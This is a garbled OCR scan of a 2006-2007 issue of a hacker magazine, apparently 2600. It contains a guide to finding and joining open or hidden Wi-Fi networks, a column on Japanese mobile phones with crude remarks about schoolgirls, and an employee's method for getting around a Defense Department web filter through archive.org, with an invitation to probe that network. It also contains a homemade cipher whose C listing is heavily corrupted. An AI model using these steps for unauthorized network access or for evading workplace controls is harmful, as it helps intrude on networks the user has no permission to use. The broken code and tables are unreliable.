data however it wi l l al so not get you l ogged by any
di fferent features, they a l l do about the same t hi ng
software or data and connecti on l ogs.
whi ch i s i ndi cate any ti me a wi rel ess connecti on i s
Are You Secure?
detected by l i ghti ng a l i ght. Some model s can al so
Connecti ng at random l ocati ons, especi al l y
tel l you t he strength and type of si gnal but I prefer to
school s and cafes, wi l l open your computer to
use my software for that and save the extra money. possi bl e attacks by many peopl e. Most wi l l be just
Winter 2006-2007P e 11
ess peopl e who cl ick on anything their system
may find al though some wil l be far more advanced
and abl e to access your system if you're not protected.
Luckil y, some basic steps can be t aken to make you
l ess of a target and not worth the troubl e among a
group of others .
First, firewal l s are a must and one from a third
party is a good idea to add an extra l ayer to whatever
your operating system may al ready have r unning.
Make sure you have them set to ask for authorization
for any connection or data transfer and that you have
security l ogs r unning. Next, make sure you have a l l
t h e updates for a n y operating system you use a s wel l
as any software that connects to the I nternet or is
l inked to the as (such as chat programs) . Final l y, it
shoul d go without saying but make sure you have a
ful l y updated anti-virus r unning.
Let's Get Started!
Option 1 Locating a connection within a specific
area: Whether it's a city bl ock where you have l unch
or your school campus, this is a great way to quickl y
map out connections without drawing any attention.
You can either make a rough drawing of t he area
you want to search or you can take a notepad to
quickl y note where you found a signal to l ook into
l ater. I n either case j ust take your wi-fi finder and
start wandering around. I f you ar e not worried about
being seen, or j ust don ' t think anyone wil l care, you
can cover the whol e area at once. Otherwise make
sure you remember where you have been so your
next trip wil l not dupl icate your progress. Again,
there are two options for a thorough search. Either
wal k around in a pattern so that al l the searchabl e
area is covered or j ust circl e buil dings or open areas
where you woul d want to connect or expect to see
a connection.
I f you want to find everything avai l abl e you
shoul d real l y wal k t hrough the search in a l ogical
progression . On the other hand if your needs are
more l egitimate you may want to narrow your search
to pl aces where you can pl ug something in to charge
or have a bathroom or soda machine nearby.
Option 2 Always on the hunt: In this case you
j ust want to keep a note of any connection you come
across in regul ar travel s or where you have no specific
target in mind. I f you ' re driving or wal king you can
easi l y cl ip your wi -fi finder on your bel t or car visor
and make a note when it goes of. On the other hand
i f you have a reasonabl e battery or are taking a short
trip you can keep your l aptop running in a backpack,
carrying case, or even folded under your ar m.
This can get somewhat cumbersome after a whil e
al though once you go t hrough an area you can prob
abl y skip it for d few months. And of course whil e
you are in an area where you know you wil l not
connect, you can either power down your gear or
compl etel y ignore it.
Signal Found - Let Me I n!
Now that you know where the signal s are it's
time to connect. The easiest method wil l be for an
unsecured access point in which case you can cl ick
connect and you ' re onl ine. Sometimes you can find
a signal but cannot connect because you need some
information and this is where you r software comes
in. Network Stumbl er wil l give you t he 5510 of any
connection and sometimes a router is set for open
access and is j ust not broadcasting its 10. So a l l you
need to do is manual l y enter it and, once again, you ' re
onl ine. Now the final piece of data from the Stumbl er
is the type of router you have accessed. Connecting
to anything other t han an unsecured access point is
beyond the scope of this articl e. Whatever you might
want to do however wil l require information on the
type of router.
Closing lps
Keep in mind that others have probabl y needed
to connect i n areas you ' re interested in as wel l .
Don ' t be afraid to ask anyone nearby if they know
of an access point. Al so, at a school campus or
office buil ding you can al ways ask security or any
computer technician. You may find out some great
information pl us if you are real l y onl y l ooking for
l egitimate access they wil l be abl e to warn you about
anything that is off l imits.
2600Aa
g
azine
Hel l o, and greeti ngs from the Central Offi ce! technol ogy operated by Ver i zon, Spri nt, Al ltel,
At l east I thi nk i t ' s the central offi ce. Unfortu- US Cel l ul ar, and numerous other U. S. carri ers,
natel y, I was al ready hal fway to Japan when the t he transmi t and recei ve frequenci es are - for
sushi hi t the fan. After I got through runni ng some reason - t he exact opposi te of t hose used
fiber to the i gl oo in Adak, my empl oyer sent i n the U.S.
me here to Tokyo. I don ' t read Japanese, but my Gl obal roami ng i s avai l abl e to Japanese
hosts assured me that central offi ces here are travel ers usi ng the GSM standard on al l three
al ways cl ean, the vendi ng machi nes are wel l - carriers, and the COMA standard usi ng Au.
stocked, and the toi l et seats are supposed to However, t hi s requi res a speci al phone, and
be heated. Unfortunatel y, they al so assured me roami ng rates are very h i gh (for example,
that when I ' m through wi th my work, I real l y domest i c cal l s i n the U. S. are about US$1. 00
do have to go home. per mi nute whi le roami ng wi th a Japanese
When I haven' t been ei ther worki ng or phone) . Thi s probabl y expl ai ns why so few
buyi ng used school gi r l s' panti es out of the Japanese phones offer gl obal roami ng; Au,
vendi ng machi ne at Love Merci Aki habara ( i t's for exampl e, currentl y onl y offers one such
on the second fl oor), I have been marvel i ng at phone.
the mobi l e phones here. Everywhere i n Japan, Everythi ng i n t hi s country is more compl i -
you ' l l fi nd peopl e texti ng, browsi ng the web, cated than it needs to be, and mobi l e phone
and taki ng pi ctures. They rarel y tal k on them, pl ans are no excepti on. There i s a di zzyi ng
though; i t ' s consi dered rude i n most publ i c array of pl ans, wi th onl y one common theme:
pl aces. Don't answer your "kei tai " (the Japa- they' re absurdl y expensive by U. S. standards.
nese word for mobi l e phone) on a trai n, or A typi cal pl an (usi ng Au as an exampl e)
you mi ght fi nd yoursel f at the wrong end of a costs about $40 per month, i ncl udi ng just 60
samurai sword! mi nutes of cal l i ng. No free ni ghts and week-
There are three major wi rel ess servi ce ends, no free l ong di stance, and certai nl y no
provi ders i n Tokyo: Soft Bank (formerl y Voda- free mobi l e-mobi l e cal l i ng. But your unused
fone), Kddi ( marketed as "Au"), and NTT mi nutes do rol l over. The extras al ways cost
( marketed as DoCoMo) . Al l offer true 3G data extra; add another $40 for u n l i mi ted wi re
networks, al though DoCoMo and SofBank use l ess data (to the handset onl y - tetheri ng i s not
UMTS (the same data technol ogy avai l abl e al l owed) . Wi rel ess data i ncludes unl i mited
from Ci ngul ar i n a few U. S. markets), and Au emai l but not text messagi ng; that ' s another
runs COMA 1 xEV-DO (avai l abl e nati onwi de two cents per message sent.
i n the U. S. from Veri zon and Spri nt) . GSM i s Mobi l e phones have so many features, you
consi dered obsol ete in Japan and is not oper- mi ght confuse them for a computer. I n addi ti on
ated by any Japanese carri er. to the text messagi ng, emai l, web browsi ng,
Al though Japan shares certai n mobi l e phone and pi cture mai l capabi l i ti es avai l abl e on most
technol ogi es wi th the U. S., onl y Japanese wi rel ess phones i n the U. S., Japanese mobi l e
phones can use Japanese mobi l e networks. phones consi der some pretty unusual thi ngs to
Thi s i s because UMTS i s used by SofBank and be standard equi pment. For exampl e, no sel f
DoCoMo for both voi ce and data, rather than respecti ng Japanese handset woul d be caught
usi ng UMTS for data and GSM for voi ce as dead wi thout a Japanese-Engl i sh di cti onary
Ci ngul ar does. Addi t i onal l y, di ferent frequen- bui l t i n. 50MB of RAM i s standard equ i pment
ci es are used by these carri ers than Ci ngul ar for a kei tai , al ong wi t h an FM radi o, streami ng
uses i n t he U. S. Whi l e Au uses t he same COMA medi a capabi l i ty, GPS navi gat i on, and a 2. 4
Winter 2006-2007Pge 13
megapixel camera.
You can use a mobi l e phone for al l sorts of
unexpected purposes in Japan, or potential l y for
pl aying al l sorts of unexpected pranks. Consider
the l owl y cel l phone camera. Apart from surrep
titiousl y taking pictures of school gi rl s on trai ns
( not that I 'd ever do such a thing), you can use
your camera phone to scan "QR codes. " These
are high density barcodes pri nted on products,
bi l l boards, and even business cards. Scanning
a QR code can do al l sorts of thi ngs, such as
l aunching a website i n your mobi l e browser,
inserti ng contact information i nto your phone
book, displ ayi ng a pict ure or wal king map, or
even downl oading a ri ng tone.
Need wal ki ng directions from the trai n
station to your hotel ? Bui l t-i n GPS navigation
has you covered, and can easi l y superimpose
your l ocation onto a map downl oaded to your
mobi l e phone (downloaded via the web or
perhaps by scan ning a QR code) . Need to pay
for a train ride or a newspaper? Reach for your
mobi l e phone and you can pay i nstantl y using
your "Mobi l e Suica" account. Want to drain
your "Mobi l e Suica" account into "Mobi l e

Figure 1: QR Code for http://www.2600.com
Pchinko?" J ust scan the wrong QR code. Ha
ha, j ust kidding . . . I thi nk.
I ' m tol d I ' m being charged by the packet to
fi l e this col umn, so it ' s time to draw this issue
of the Telecom Informer to a cl ose. Assuming I
don ' t eat any bad fugu, I ' l l be back in the u. S.
for my next col umn. Unti l t hen, domo arigato
and sayonara. And if you see him, tel l my boss
that I expect a heated toi l et seat in my office
when I return!
Ofr 1IL
TecbnoIo
HackerFer
BROADCAST FOR ALL THE
Wednesdas, 1900-2000 ET
WA 99.5 FM, New York City
WBCQ 7415 Kz - shortwave to North Aerica
ad at http://w .2600.comoffthehook over the net
Caus during the show at 1 212 209 2900.Ema oth@2600.com
wth your comments.
Ad yes, we ae interested in simulcasting on other stations or
va satelite. Contact us i you ca help spread "Off The Hook" to
more listeners!
Pge 14 2600 Magazine
by Comspec - Sigma Nu see i f you can' t fi nd a good radi o stati on t hat has the
I ' m a 22-year-ol d network securi ty engi neer for magi cal abi l i ty to make you not sl eep at work. Wel l ,
the Department of Defense and have been for a l i ttl e you soon real i ze that thi s i s nearl y i mpossi bl e wi th
over four months now. I ' ve been operati ng i n some a l l the fi l trati on goi ng on. I admi t thi s i s pretty cheesy
fashi on in the i nformati on i ndustry si nce I was 14. but an i nteresti ng way to get around it. I ' m goi ng to
I guess you coul d say my job is pretty i nteresti ng. use the exampl e for DUm. That seems to be the onl y
I work normal hours: 8-5 Monday - Fri day. I ' m a musi c that can keep me awake at work whi l e I am
Si gma Nu and I l i ve at Ol d Domi ni on University i n updati ng network di agrams or fi el di ng phone cal l s
thei r crappy semi -new devel opment the University from shi tty outposts in Japan or some other remote
Vi l l age. ODU i sn' t al l that bad. l ocati on around the worl d.
On my fi rst day on the job I noti ced the DoD (1) Go to Archi ve. org ( Everyone knows t hi s pl ace
had i mpl emented a proxy that conti nuousl y grows wel l , or shoul d. Read more on them on thei r si te. )
i n its fi l teri ng capabi l i ti es based on pol i ci es wri tten ( 2) Once you' re there i n the top mi ddl e porti on
i n by contracted i ndi vi dual s here i n my offi ce. I t' s of your screen you shou l d see the way-back machi ne
cal l ed SmartFi l ter. What a pai n i n t he ass t hi s thi ng i nput text area. For t hi s exampl e I used www. dUm.
i s. If you want to wri te on restri cti ons of i nformati on, That ' s Di gi tal l y I mported Radi o. Cl i ck "Take Me
i s one hel l of a bi g one. Of course i t' s a govern- Back. "
ment network and that makes al l the di fference from (3) The next page that comes up wi l l l i st the dates
a l egal standpoi nt. Personal ly, I ' m al l for al l owi ng that Archi ve. org crawl ed across t he si te and archi ved
certai n thi ngs to be run on my network wi thi n l i mi ted its contents. You' l l want to l ook for the most up-to-
means. It is wi del y known that streami ng audi o i s date one. Out of habi t I usual l y choose those that
a bandwi dth ki l l er i n some i nstances. Wel l , due to have a *. That denotes that the si te was recentl y
l i mited fundi ng here at NEXCOM t hi s was sai d to be updated. The l ast entry that was showi ng when I
a bi g probl em. Unt i l they added i t to the proxy l i st as performed t hi s was Apri l 1 st 2005. Cl i ck on the l i nk.
a bi g no-no. Oh wel L. . . (4) Once t he Di gi tal l y I mported si te come up you
The chi ef securi ty guy si ts in the office next me. can scrol l down to the musi c of your choi ce. From
He' s conti nuousl y tryi ng to get our organi zati on thi s poi nt you have two opti ons. Try them both and
up-to-date wi th the securi ty standards set forth by see whi ch works for you. (1) Usi ng Wi namp, scrol l
Vi sa and other organi zati ons for transacti ons but he down t o whatever musi c you choose. Cl i ck on one of
l acks in j ust about everyt hi ng el se. For Chri st' s sake the l i nks l i sted under " Li sten Now. " Your medi a pl ayer
we don' t even have any of the necessary securi ty shoul d automati cal l y navi gate though Archi ve. org
patches for XP yet. and begi n to bufer the stream from DUm. (2) Sti l l
The fol l owi ng i s a set of gui del i nes to go by to usi ng Wi namp, ri ght cl i ck on one of the l i nks l i sted
ci rcumvent thei r current system. By no means shoul d under " Li sten Now" and copy t he shortcut. Then
t hi s i nformati on be used to break any l aws. Don' t open up Wi namp and under the fi l e menu choose
bl ame me i f your supervi sor runs in and confronts to i nput the URL. Copy and paste the URL there and
about thi s. I j ust thought i t woul d be an i nter- cl i ck OK.
esti ng read. I woul d appreci ate some comments back Li ke I sai d before when work has got you down
from those i ndi vi dual s who are abl e to attempt t hi s t hi s i s al ways an opti on. Pl ease cont i nue t o experi -
n thei r own departments. I f you woul d l i ke to know ment wi th the i nternal network. I f you fi nd anythi ng
any more i nformati on pertai ni ng to thi s network hi t i nteresti ng I i mpl ore you to send the i nformati on my
me up. I thi nk you ' l l fi nd it to be a pretty i nteresti ng way. I ' m attempti ng to compi l e a l i ttl e qui ck refer-
a crappy i nternati onal setup. Anyways, back to ence document for fun and i nteresti ng t hi ngs to do
real meaL. . on our network. I can be reached at Comspec2600
Let' s say your job sucks and you want to pass the on AI M. Enjoy the i nformati on and you a l l keep up
a l i ttl e faster. So you deci de t o surf a l i ttl e and t he thi rst for i nformati on and good work.
Winter 2006-2007Pge 15
by Dale Thorn
d_Ch_o_r _n@yahoo.com
Al gori thmi c encrypti on as I envi si on i t uses an
executabl e program, a pl ai ntext fi l e, and a password
or passwords to change the pl ai ntext fi l e to a ci pher
text fi l e. PCP as I understand i t is an al gori thmi c
encrypti on program, as compared to programs that
use One-Ti me Pads (OTP) , for exampl e. An al go
ri thmi c program wi l l general l y use advanced math
emati cs such as l arge pri me numbers, el l i pti c curves,
di screte l ogari thms, and so on to generate ostenSi bl y
random bi tstreams whi ch, when XOR' d wi th the
pl ai ntext, produces the unreadabl e Ci phertext.
Encrypti on wi thout math has a di stant s i mi l ari ty
to the OTP method, in that a fi xed l ookup tabl e of
numbers is used as part of the process to generate the
pseudo random val ues used in the encrypti on.
I have to i nterject here that the program I ' m about
to descr i be has wi thstood several pl ai ntext attacks
where the attacker sends me tens of thousands of
pl ai ntext or bi nary fi l es and I encrypt them wi th
the same passwords and program that encrypted
the secret contest fi l e. When I return the encrypted
fi l es to the attacker, i f they can deduce the pattern
or sequence of the encrypti on and thus decrypt
the secret fi l e, they wi n thousands of dol l ars as the
contest pri ze.
The l ookup tabl e I currentl y use was generated
from a si mpl e pseudo random number generator,
whi ch is more than suffi ci ent for my purposes. The
qual i ty of randomness is not i mportant for the l ookup
tabl e. The program i s usual l y r un wi th several pass
word numbers, and the compl ete file i s encrypted
once for each number entered. Each password
number pul l s numbers from the l ookup table begi n
ni ng at that val ue i n the l ookup tabl e and proceedi ng
through t he tabl e sequenti al l y unt i l t he end, where i t
wraps around to the fi rst number.
A group of l ookup tabl e numbers are pl aced i nto
an array (array "A"), and an equival ent number of
sequenti al val ues (from zero to " n" ) are pl aced i nto a
same-si zed array (array " B" ) . Array "A" is then sorted
and the val ues in array " B" are swapped the same
way as the val ues i n array "A". Array "A, " contai ni ng
the sorted l ookup tabl e numbers, is then di scarded.
Array " B", contai ni ng numbers whi ch are now in an
apparent random order, ar e used t o reposi ti on (or
shuffle) the bi ts i n the pl ai ntext fi l e.
For exampl e, the two arrays mi ght start of as
Pge 16
fol l ows:
Index Sequential Array Random Array
0 0 5 7 4 3
1 3 4 9 6
2 2 1 7 7 2 9
3 3 8 9 3 3
4 4 1 0 1 5 0
5 5 1 45 8 4
6 6 2 2 3 6 2
3 1 9 5 5
8 8 2 8 6 7
9 9 1 6 3 8 3
Afer sorti ng by the val ues i n the random number
array:
Index Sequential Array Random Array
0 8 2 8 6 7
1 0 5 7 4 3
2 3 8 9 3 3
3 4 1 0 1 5 0
4 1 3 4 9 6
5 5 1 45 8 4
6 9 1 6 3 8 3
7 2 1 7 7 2 9
8 6 2 2 3 6 2
9 3 1 9 5 5
I n the second exampl e, afer sorti ng you wi l l see
that the sequenti al number array is now in a more or
l ess random order and t he ori gi nal l y random array
is ful l y sorted. We now di scard the random number
array and move the bi ts from thei r ori gi nal sequenti al
posi ti ons ( the " i ndex" col umn) to the random posi
t i ons shown i n t he " Sequenti al Array" col umn.
The good news about us i ng array " B" t o shuffl e
bi ts i n the pl ai ntext i s the fact that there are no dupl i
cate val ues i n array " B" and no mi ssi ng numbers
ei ther. Therefore we don' t need a "hash" or other
math-ori ented techni que to cal cul ate the move-to
bit posi ti ons. Another bit of good news is that s i nce
we' re not usi ng the l ookup tabl e numbers di rectl y
t o cal cul ate t he move-to posi ti ons, we don ' t have to
worry about weaknesses in the encrypti on due to the I
l ow qual ity " randomness" of the val ues i n the l ookup
.
tabl e.
Another maj or factor i n randomi zi ng the ci pher
text output is the fact that I use several password
numbers to encrypt, with each password addi ng
about 20 bi ts of securi ty as i t' s commonl y referred to
in the crypto busi ness. The real tri ck here is that s i nce
each password number i s di ferent, the addi ti onal
2600 Me
crypto l ayers after the fi rst one use di fferent segments
of the l ookup tabl e, l ayered over top of each other.
And unl i ke conventi onal codes that can decrypt
mul t i pl e XOR' d l ayers in any sequence, the code
descri bed here requi res al l l ayers to be decrypted i n
t he exact reverse order of t he encrypti on, el s e the
pl ai ntext cannot be recovered.
Another factor i n randomi zi ng the output i s the
use of random si zed groups of bi ts when shuffl i ng
the bi t s. One l ookup tabl e val ue provi des t he group
si ze ( " n") , then the next "n" l ookup val ues are used to
fi l l the "N array as descri bed above. A fourth factor
in preventi ng pl ai ntext and ci phertext attacks from
bei ng successful - by anal yzi ng thousands of fi l es
wi th j ust a si ngl e " 1 " bi t in each fi l e to see where the
bi t moved to afer encrypti on - i s to use the fi l ename,
or add a seri al number to each fi l e and use that name
or number to further iterate the password so that
each encrypti on i s di fferent for each fi l e.
Lastl y, the fi l enames or seri al numbers are them
sel ves randomi zed i n a way that di sal l ows an attacker
to control the names or numbers to make thei r contri
buti on predi ctabl e. Gi ven al l of the above, and wi th
a si mpl e l ookup tabl e of 2"20 val ues, i t may sti l l
b e possi bl e to crack the encrypti on i n a pl ai ntext or
ci phertext attack i f consi derabl y more than a mi l l i on
fi l es are submi tted for the chosen attack. I woul d
guess that t hi s code i s very secure for al l i ndi vi dual
encrypti ons performed by an i ndi vi dual manual l y
dur i ng thei r l i feti me, even usi ng the same set of pass
word numbers dur i ng that enti re ti me, but for use i n
a typi cal encrypti on server that processes thousands
to mi l l i ons of transacti ons per day, you woul d want
to change the passwords each day.
In the process of devel opi ng t hi s code, I read the
very l engthy FAQs on the sci . crypt websi te, I read
several versi ons of the famous "snakeoi l " FAQ, I read
several papers on di ferenti al anal ysi s, and I part i ci
pated i n the cypherpunks forum for about seven
months. I al so corresponded with a few of the wel l
known crypto experts, but I have to say that the near
universal opi n i on of the experts i s that you cannot have
a secure al gori thmi c crypto program that doesn' t use
/* CCRP . H * /
typedef char C ; / *
typedef double D ; / *
typedef foat F
typedef int I ;
typedef long L ;
typedef unsigned int U ;
typedef unsigned char UC ;
typedef void V;
I bitget ( C *cstr , I ibit ) ;
V bitput ( C *cstr , I ibit , I iput ) ;
the hi gh l evel mathemati cs as descri bed above. Or, if
al l you need to create is a pri vate-key program such
as mi ne, you woul d sti l l have to generate a random
bi tstream and XOR those bi ts agai nst the pl ai ntext
fi l e to get a secure encrypti on. Crypto experts j ust
don' t trust bit shuffl i ng techni ques, al bei t that in the
real worl d the best randomness i s usual l y obtai ned
by shuffl i ng, as in pl ayi ng cards or l ottery t umbl ers.
One of the fasci nati ng t hi ngs about current cryp
tography i s the di scussi on of quantum computers
and the assumed fact that al l password-encrypted
fi l es now archi ved by vari ous agenci es wi l l be easi l y
decrypted by t he quantum computers when those
computers are ful l y functi onal . I t suggests to me that
the assumed l evel of securi ty of conventi onal cryp
tography may be a fal se hope, especi al l y i f peopl e
have sent PG P messages that they can' t afford to
have read by the wrong peopl e. One possi bl e posi
ti ve poi nt wi th thi s code i s that 1) Due to the desi gn,
the number of encrypti on l ayers per fi l e i s not l i mited
and 2) The design requi res physi cal mul ti -l ayer
reshuffl i ng rather than si ngl e pass XOR' i ng, whi ch
tends to defeat the shortcut mathemati cal wi zardry
of quantum decrypti on. li me wi l l tel l .
The fol l owi ng C code i s DOS-based a n d I al so
have VB5 and DOS BASI C versi ons. The DOS BASI C
code, predi ctabl y, runs several t i mes as sl ow as t he
DOS C code, however the VB5 code i s t wi ce as fast
as the DOS C code. Thi s C code wi l l compi l e OK
usi ng the Mi crosoft Qui ck-C compi l er ci rca 1 991,
but I ' ve al so speci fi ed "typedefs" so that t he vari abl es
used in the program can be resi zed for di fferent pl at
forms. I f any of the vari abl es are resi zed, you may
have to resi ze one or more of the " mal l ocO" al l oca
ti ons i n the " i fn_cryp" routi ne.
Thi s program i s cal l ed from a command l i ne for
encrypti on as fol l ows:
CCRP filename Ie passwordno 1 passwordn02
passwordn03 . . . .
Decrypti on i s cal l ed a s fol l ows:
CCRP filename Id passwordno 1 passwordn02
passwordn03 . . . .
char ( strings , nul l-terminated ) * /
double foat ( double precision ) * /
/ * foat ( single precis ion ) * /
/ * short integer ( s igned ) * /
/ * long integer ( s igned ) * /
/ * short integer ( unsigned ) * /
/ * unsigned character * /
/ * void data type * /
V ifn_cryp ( U ibuf , FILE *ebuf , I iopr , L llof , L lrnd ) ;
V ifn_msgs ( C * cms g , I iof s , I irow, I icol , I ibrp , I iext ) ;
V ifn_read ( C * cbuf , L lbyt , U ibuf , FILE * ebuf ) ;
V ifn_sort ( l * int l , L * lnt2 , I * istk, I imax ) ;
V ifn_write ( C *cbuf , L lbyt , U ibuf , FILE * ebuf ) ;
U io vadr ( I inop ) ;
V io=vcls ( I iclr ) ;
V io_vCSr ( I irow, I iccl , I icsr ) ;
Winter 2006-2007Pa e 17
V io_vdsp ( C *cdat ,
L Itable ( L lrnd ) ;
irow, I icc! , I iclr ) ;
union REGS rg;
U far *uvadr = o
1 * CCRP . C * 1
#include " stdlib . h "
#include " string . h "
#include " stdio . h "
#include " dos . h "
#include " io . h"
#include " ccrp . h "
V main ( I argc , C * *argv)
1 * DOS registers declaration ( video ) * 1
1 * video display pointer * 1
/ * get user ' s command-line arguments * /
/ * initialize the User message string * / C cmsg [ 6 4 ] ;
C cwrd [ 5 8 ] " ! #$%& ' ( ) +_ . 0 1 2 3 4 5 6 7 8 9 @ABCDEFGHIJKLMNOPQRSTUVXYZ [ ] _ - {
}
-0" ;
C cwrx [ 5 8 ] =
U ibeg;
tr _
1 * initialize the loop-begin variable * 1
1 * set the maximum fle buffer length * 1
/ * initialize a temporary character variable * /
/ * initialize the filename extension separator * /
1 * initialize a temporary loop variable * 1
1 * initialize the loop-ending variable * 1
1 * initialize a temporary length variable * 1
1 * initialize the loop-increment variable * 1
/ * initialize a temporary loop variable * j
U ibuf = 2 0 4 8 ;
C *cchr ;
U idot ;
U idx2 i
U iend;
U ileni
U iner;
U indx i
I iopr ; j * initialize the operation code * /
1 * initialize length o f flename chars * 1
1 * initialize the file length variable * 1
1 * initialize the lookup table value * 1
1 * get next available DOS file handle * 1
1 * video display pointer * 1
1 * allocate filename sort index array * 1
1 * allocate flename sort lookup array * 1
1 * allocate flename sort stack array * 1
U iwrd = strlen ( cwrd ) ;
L 110f ;
L lrnd;
FILE *ebuf ;
U far *uvadr
I int1 [ 5 8 ] ;
L Int2 [ 5 8 ] ;
I istk [ 5 8 ] ;
if ( argc == 1 ) {
O
strcpy( cmsg , " Usage : CCRP ( v4 . 3 )
ifn_msgs ( cmsg , 4 , 2 4 , 7 9 , 0 , 1 ) ;
1 * a comand line was not supplied * 1
flename [ le i d ] [ key 1 key2 . . . . ] " ) ;
1 * display usage message and exit * 1
i f ( argc * 4 I I argc > 1 5 ) { 1 * no . of seed keys should be one to 12 * 1
ifn_msgs ( " Invalid number o f parameters " , 4 , 2 4 , 7 9 , 1 , 1 ) ;
/ * display error message [ above ] and exit * /
i f ( argv[ 2 ] [ O ] ! = I ) { 1 * slash preceding opcode param missing * 1
ifn_msgs ( " Invalid operation parameter" , 4 , 2 4 , 7 9 , 1 , 1 ) ;
1 * display error message [ above ] and exit * 1
strupr ( argv[ I ] ) ; 1 * uppercase the target flename * 1
strupr ( argv [ 2 ] ) ; 1 * uppercase the operation code * 1
i f ( strchr ( " ED" , argv[ 2 j [ 1 J ) = = NULL ) { 1 * invalid opcode parameter * 1
ifn_msgs ( " Invalid operation parameter " , 4 , 2 4 , 7 9 , 1 , 1 ) ;
1 * display error message [ above ] and exit * 1
idot = strcspn ( argv [ l ] , " . " ) ; 1 * position o f flename extension separator * 1
ilen = strlen ( argv [ 1 ] ) ; 1 * length of target flename * 1
i f ( idot = = 0 I I idot > 8 I I ilen - idot > 4 ) { 1 * flename is bad * 1
ifn_msgs ( " Invalid flename " , 4 , 2 4 , 7 9 , 1 , 1 ) ; 1 * flename i s bad * I
1 * display error message [ above ] and exit * 1
if ( idot * ilen ) { 1 * flename extension separator found ! * 1
if ( strcspn ( argv [ 1 ] + idot + 1 , " . " ) * ilen - idot - 1 ) {
ifn_msgs ( " Invalid flename" , 4 , 2 4 , 7 9 , 1 , 1 ) ; / * 2nd ' . ' was found ! * /
if ( idot = = ilen - 1 )
ilen--;
argv[ 1 ] [ ilen ] ' \ 0 ' ;
1 * display error message [ above ] and exit * 1
1 * extension separator at end o f flename * 1
1 * decrement length o f target flename * 1
1 * decrement length of target flename * 1
ebuf = fopen ( argv [ 1 ] , " rb+ " ) ; i * open the selected fle * 1
llof = flelength ( fleno ( ebuf ; 1 * get length of selected fle * 1
if ( ebuf = = NULL I I llof = = - I L I I llof 0 ) { 1 * length=O o r call failed * 1
fclose ( ebuf ) ; 1 * close the selected fle * 1
remove ( argv[ 1 ] ) ; 1 * kill the zero-length file * 1
strcpy ( cmsg, argv[ 1 ] ) ; 1 * copy flename to message * 1
P
g
e 1 B 2600 Ma
g
azine
v
}
strcat ( cmsg , " not found" ) ;
ifn_msgs ( cmsg , 4 , 2 4 , 7 9 , 1 , 1 ) ;
/ * add " not found" to message * /
/ * display message and exit * /
iopr = argv [ 2 ) [ l ) - 6 8 ;
i f ( iopr = = 1 ) {
/ * opcode ( l=encrypt , O=decrypt ) * /
1 * this is the encrypt operation * /
/ * set the loop-begin variable * /
1 * set the loop-ending variable * 1
1 * set the loop-increment variable * 1
1 * this is the decrypt operation * 1
1 * set the loop-begin variable * 1
1 * set the loop-ending variable * 1
/ * set the loop-increment variable * 1
}
ibeg 3 ;
iend argc ;
incr 1 ;
else
ibeg
iend
incr
argc - 1 ;
2 ;
- I i
for ( indx = ibeg; indx 1 = iend; indx += incr ) { / * loop thru #of seed keys * /
lrnd = atol ( argv[ indx % ( L ) 1 0 4 8 5 7 6 ; 1 * get lookup table seed key * 1
for ( idx2 = 0 ; idx2 < iwrd; idx2++ ) { 1 * loop through array elements * /
int1 [ idx2 ) = idx2 ; 1 * offsets from current byte offset * /
lrnd = Itable ( lrnd ) ; / * get the next lookup table value * /
Int2 [ idx2 ) = lrnd ; / * put lookup value to sort array * /
ifn_sort ( intl , Int2 , istk , iwrd - I ) ;
for ( idx2 = 0 ; idx2 < iwrd; idx2++ ) {
/ * sort lookup array * /
1 * loop thru flename chars * /
cwrx [ intl [ idx2 = cwrd [ idx2 ) ;
}
1 * shuffe bytes in valid flename chars [ above ) * 1
lrnd = atol ( argv[ indx % ( L ) 1 0 4 8 5 7 6 ; 1 * get lookup table seed key * /
for ( idx2 = 0 ; idx2 < ilen : idx2++ ) { / * loop thru flename chars * 1
i f
cchr = strchr ( cwrx , argv [ 1 ) [ idx2 ; 1 * flename char . position * 1
if ( cchr == NULL ) { / * character not found in flename * 1
ifn_msqs ( U lnvalid character i n flename " , 4 , 2 4 , 7 9 , 1 , 1 ) ;
}
lrnd
lrnd
/* display error message [ above ) and exit * /
( lrnd + ( cchr - cwrx + 1 % ( L ) 1 0 4 8 5 7 6 ; / * add value to seed * /
Itable ( lrnd ) ; 1 * reiterate value of seed key * 1
( iopr == 1 )
{
/ * encrypt operation specifed * /
ifn_msgS ( " Encrypting layer" g 4 , 2 4 , 7 9 , 0 , 0 ) ; 1 * encrypt msg . * 1
else { / * decrypt operation specifed * /
ifn_msgS ( " Decrypting layer " , 4 , 2 4 , 7 9 , 0 , 0 ) ; / * decrypt msg . * 1
itoa ( indx - 2 , cms g, 1 0 ) ;
ifn_msgs ( cmsg , -2 1 , 2 4 , 7 9 , 0 , 0 ) ;
ifn_cryp( ibuf , ebuf , iopr , llof , lrnd ) ;
/ * convert ' indx ' to string * 1
/ * show layer number message * 1
/ * encrypt or decrypt * 1
ifn_msgs ( " Translation complete" , 4 , 2 4 , 7 9 , 0 , 1 ) ;
ifn_cryp ( U ibuf , FILE * ebuf , I iopr, L llof , L lrnd) { / * encrypt routine * 1
1 * initialize the User message string * 1
1 * initialize the bit offset i n cbuf * 1
/ * initialize the EOF fag * /
/ * initialize a temporary length variable * 1
/ * initialize the for-next loop counter * 1
1 * initialize the fle pointer variable * 1
1 * initialize the fle buffer * /
/ * initialize the temp buffer * 1
1 * allocate the sort index array * 1
C cmsg [ 64 ) ;
U ibit =
I ieof "
U ilen;
U indx;
L Ibyt ;
C * cbuf
C *ctmp =
I * int1
L * lnt2
I * istk
0 ;
0 ;
( C
( C
( I
( L
( I
* ) malloc ( 20 4 8 ) ;
* ) malloc ( 2 0 4 8 ) ;
* ) malloc ( 3 0 7 4 ) ;
* ) malloc ( 6 1 4 8 ) ;
* ) malloc ( 3 0 7 4 ) ;
1 * allocate sort lookup number array * 1
/ * allocate the sort stack array * 1
for ( lbyt = 0 ; Ibyt < llof ; Ibyt + = ibuf ) { / * process in ibuf segments * 1
1 * s o we don ' t divide by zero * 1
1 * convert pet . to string * 1
append ' % ' symbol to message * /
/ * erase prev. complete msg . * 1
1 * show pct . completed msg . * 1
if ( llof > ( L ) ibuf ) {
}
Itoa ( lbyt I ( llof I 1 00 ) , cmsg, 1 0 ) ;
strcat ( cmsg , " % " ) ; 1 *
ifn_msgs ( " .. , -24 , 2 4 , 7 9 , 0 , 0 ) ;
ifn_msgs ( cmsg , -2 4 , 2 4 , 7 9 , 0 , 0 ) ;
if ( lbyt + ibuf >= llof ) {
ibuf ( U ) ( llof - Ibyt ) ;
ieof = 1 ;
/ * current fle pointer + ibuf spans EOF * /
/ * reset fle buffer length * 1
/ * set the EOF fag ON * /
